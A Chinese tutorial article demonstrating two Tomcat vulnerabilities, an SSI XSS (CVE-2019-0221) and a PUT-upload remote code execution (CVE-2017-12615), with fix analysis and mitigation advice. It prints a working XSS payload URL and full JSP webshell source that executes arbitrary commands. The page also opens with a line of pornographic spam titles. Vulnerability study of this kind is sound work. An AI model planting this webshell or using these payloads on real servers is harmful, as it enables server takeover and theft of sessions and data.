日本黄色一级经典视频|伊人久久精品视频|亚洲黄色色周成人视频九九九|av免费网址黄色小短片|黄色Av无码亚洲成年人|亚洲1区2区3区无码|真人黄片免费观看|无码一级小说欧美日免费三级|日韩中文字幕91在线看|精品久久久无码中文字幕边打电话

當前位置:首頁 > > 架構(gòu)師社區(qū)
[導讀]Tomcat是一個開源的輕量級Web應(yīng)用服務(wù)器,在我們平常工作過程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術(shù)也會去閱讀學習Tomcat的源碼。但正如著名詩人李白所說的:世界上本沒有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


Tomcat是一個開源的輕量級Web應(yīng)用服務(wù)器,在我們平常工作過程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術(shù)也會去閱讀學習Tomcat的源碼。但正如著名詩人李白所說的:世界上本沒有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存在文件包含漏洞。今天我們選擇兩個比較直觀的Tomcat漏洞去模擬整個漏洞被攻擊的過程,以及漏洞為什么會產(chǎn)生,Tomcat大神們又是如何應(yīng)對的。

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


01


攻擊一:XSS攻擊


一、SSI技術(shù)說明

首先演示的漏洞和Tomcat的SSI功能有關(guān),SSI是什么

SSI技術(shù),也叫作Serve Side Includes,SSI(服務(wù)器端包含)是放置在HTML頁面中的指令,并在服務(wù)頁面時在服務(wù)器上對其進行評估。它們使您可以將動態(tài)生成的內(nèi)容添加到現(xiàn)有的HTML頁面,而不必通過CGI程序或其他動態(tài)技術(shù)來提供整個頁面。使用SSI技術(shù)文件默認的后綴名為.shtml; 

舉例:我們可以將指令放置到現(xiàn)有的HTML頁面中,例如:

!--#echo var="DATE_LOCAL" -->

當該頁面被執(zhí)行時,將會顯示如下結(jié)果

Sunday, 22-March-2020 18:28:54 GMT

SSI最常見的用途之一:輸出CGI程序的結(jié)果,例如``命中計數(shù)器''。關(guān)于該技術(shù)更為詳細的說明參見:http://httpd.apache.org/docs/current/howto/ssi.html


二、為Tomcat開啟SSI

1. 準備好JRE、tomcat環(huán)境,我選擇的是“apache-tomcat-9.0.10” (該漏洞受影響的版本有:Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 )

2. 修改conf/context.xml第19行,開啟權(quán)限

<Context privileged="true">

3. 修改conf\web.xml,開啟SSI Servlet。該段代碼默認是被注釋掉的,我們刪除注釋即可,代碼在310-322行。

<servlet> <servlet-name>ssi</servlet-name> <servlet-class> org.apache.catalina.ssi.SSIServlet </servlet-class> <init-param> <param-name>buffered</param-name> <param-value>1</param-value> </init-param> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>expires</param-name> <param-value>666</param-value> </init-param> <init-param> <param-name>isVirtualWebappRelative</param-name> <param-value>false</param-value> </init-param> <load-on-startup>4</load-on-startup> </servlet>

去掉關(guān)于ssi配置的注釋 422-425行

 <servlet-mapping> <servlet-name>ssi</servlet-name> <url-pattern>*.shtml</url-pattern> </servlet-mapping>

4. 在根目錄下添加madashu_env.shtml(習慣性命名為printEnv.shtml)文件,位于webapps/ROOT/ssi/

<html><head><title></title><body>Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>Env: <!--#printenv --></body></html>

5. 啟動Tomcat即可


三、發(fā)起攻擊

1. 我們輸入以下url看下效果

http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3E

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

2. XSS注入


  
http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3E
攻擊成功,頁面展示如下。

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

通過這種方式我們使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁程序,攻擊者還可能得到包括但不限于更高的權(quán)限(如執(zhí)行一些操作)、私密網(wǎng)頁內(nèi)容、會話和cookie等各種內(nèi)容。


四、源碼分析

漏洞產(chǎn)生后,Tomcat大神們迅速修復了該漏洞,我們從Github上找到當時的代碼修復提交記錄:

https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


說真的,當時看到這段修復代碼我是驚呆了,這是什么騷操作!??!“entity”又是什么鬼?。?!

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


于是接下往下翻代碼

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

這個地方將我們輸入的變量值直接輸出到了網(wǎng)頁,很明顯剛剛的entity應(yīng)該是進行了轉(zhuǎn)碼。我們找到SSIMediator.java文件,路徑org.apache.catalina.ssi. SSIMediator

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


這樣我們一下子就明白過來了,當發(fā)現(xiàn)是“entity”編碼,會將輸入的內(nèi)容進行Escape,從而避免了XSS。
估計大神們當時也是緊急出了個hotfix版本,直接把參數(shù)寫死成“entity”。還有作為Web服務(wù)器,
大神們竟然也會犯這么低級別的錯誤,所以這也解釋了為什么不存在0Bug的系統(tǒng),哈哈!去翻看最新的SSIPrintenv.java文件,已經(jīng)把“entity”定義成常量了,這才專業(yè)嘛!

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


02


攻擊二:遠程代碼執(zhí)行


接下來再簡單演示下遠程代碼執(zhí)行漏洞,該漏洞為高危漏洞,即使是非默認配置,但是一旦存在漏洞,那么攻擊者可以成功上傳 Webshell,并控制服務(wù)器。


1. 通過put方式上傳文件,請求進行中時進行攔截:


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


2. 生成惡意文件,取名叫jiansheng.jsp

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>


3. 遠程上傳成功,接下來就可以愉快地在這個不屬于我們自己的tomcat里玩耍了

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

整個代碼也是比較簡單的,可以翻看JspServlet.java,這里就不做演示了。

說明:該漏洞影響范圍非常廣,從 5.x 到 9.x 全部中槍。最好的解決方式是將 conf/web.xml 中對于 DefaultServlet 的 readonly 設(shè)置為 true。



【結(jié)語】興趣是最好的老師,我們通過去看大佬們掉過的坑,寫過的代碼,站在巨人的肩膀人可以更快速地提升自己。有興趣的小伙伴可以去看看Tomcat已爆出的漏洞:

http://tomcat.apache.org/security-9.html
本次演示的兩個漏洞分別是CVE-2019-0221,CVE-2017-12615。


特別推薦一個分享架構(gòu)+算法的優(yōu)質(zhì)內(nèi)容,還沒關(guān)注的小伙伴,可以長按關(guān)注一下:

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

長按訂閱更多精彩▼

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

如有收獲,點個在看,誠摯感謝

免責聲明:本文內(nèi)容由21ic獲得授權(quán)后發(fā)布,版權(quán)歸原作者所有,本平臺僅提供信息存儲服務(wù)。文章僅代表作者個人觀點,不代表本平臺立場,如有問題,請聯(lián)系我們,謝謝!

本站聲明: 本文章由作者或相關(guān)機構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點,本站亦不保證或承諾內(nèi)容真實性等。需要轉(zhuǎn)載請聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請及時聯(lián)系本站刪除。
換一批
延伸閱讀

LED驅(qū)動電源的輸入包括高壓工頻交流(即市電)、低壓直流、高壓直流、低壓高頻交流(如電子變壓器的輸出)等。

關(guān)鍵字: 驅(qū)動電源

在工業(yè)自動化蓬勃發(fā)展的當下,工業(yè)電機作為核心動力設(shè)備,其驅(qū)動電源的性能直接關(guān)系到整個系統(tǒng)的穩(wěn)定性和可靠性。其中,反電動勢抑制與過流保護是驅(qū)動電源設(shè)計中至關(guān)重要的兩個環(huán)節(jié),集成化方案的設(shè)計成為提升電機驅(qū)動性能的關(guān)鍵。

關(guān)鍵字: 工業(yè)電機 驅(qū)動電源

LED 驅(qū)動電源作為 LED 照明系統(tǒng)的 “心臟”,其穩(wěn)定性直接決定了整個照明設(shè)備的使用壽命。然而,在實際應(yīng)用中,LED 驅(qū)動電源易損壞的問題卻十分常見,不僅增加了維護成本,還影響了用戶體驗。要解決這一問題,需從設(shè)計、生...

關(guān)鍵字: 驅(qū)動電源 照明系統(tǒng) 散熱

根據(jù)LED驅(qū)動電源的公式,電感內(nèi)電流波動大小和電感值成反比,輸出紋波和輸出電容值成反比。所以加大電感值和輸出電容值可以減小紋波。

關(guān)鍵字: LED 設(shè)計 驅(qū)動電源

電動汽車(EV)作為新能源汽車的重要代表,正逐漸成為全球汽車產(chǎn)業(yè)的重要發(fā)展方向。電動汽車的核心技術(shù)之一是電機驅(qū)動控制系統(tǒng),而絕緣柵雙極型晶體管(IGBT)作為電機驅(qū)動系統(tǒng)中的關(guān)鍵元件,其性能直接影響到電動汽車的動力性能和...

關(guān)鍵字: 電動汽車 新能源 驅(qū)動電源

在現(xiàn)代城市建設(shè)中,街道及停車場照明作為基礎(chǔ)設(shè)施的重要組成部分,其質(zhì)量和效率直接關(guān)系到城市的公共安全、居民生活質(zhì)量和能源利用效率。隨著科技的進步,高亮度白光發(fā)光二極管(LED)因其獨特的優(yōu)勢逐漸取代傳統(tǒng)光源,成為大功率區(qū)域...

關(guān)鍵字: 發(fā)光二極管 驅(qū)動電源 LED

LED通用照明設(shè)計工程師會遇到許多挑戰(zhàn),如功率密度、功率因數(shù)校正(PFC)、空間受限和可靠性等。

關(guān)鍵字: LED 驅(qū)動電源 功率因數(shù)校正

在LED照明技術(shù)日益普及的今天,LED驅(qū)動電源的電磁干擾(EMI)問題成為了一個不可忽視的挑戰(zhàn)。電磁干擾不僅會影響LED燈具的正常工作,還可能對周圍電子設(shè)備造成不利影響,甚至引發(fā)系統(tǒng)故障。因此,采取有效的硬件措施來解決L...

關(guān)鍵字: LED照明技術(shù) 電磁干擾 驅(qū)動電源

開關(guān)電源具有效率高的特性,而且開關(guān)電源的變壓器體積比串聯(lián)穩(wěn)壓型電源的要小得多,電源電路比較整潔,整機重量也有所下降,所以,現(xiàn)在的LED驅(qū)動電源

關(guān)鍵字: LED 驅(qū)動電源 開關(guān)電源

LED驅(qū)動電源是把電源供應(yīng)轉(zhuǎn)換為特定的電壓電流以驅(qū)動LED發(fā)光的電壓轉(zhuǎn)換器,通常情況下:LED驅(qū)動電源的輸入包括高壓工頻交流(即市電)、低壓直流、高壓直流、低壓高頻交流(如電子變壓器的輸出)等。

關(guān)鍵字: LED 隧道燈 驅(qū)動電源
關(guān)閉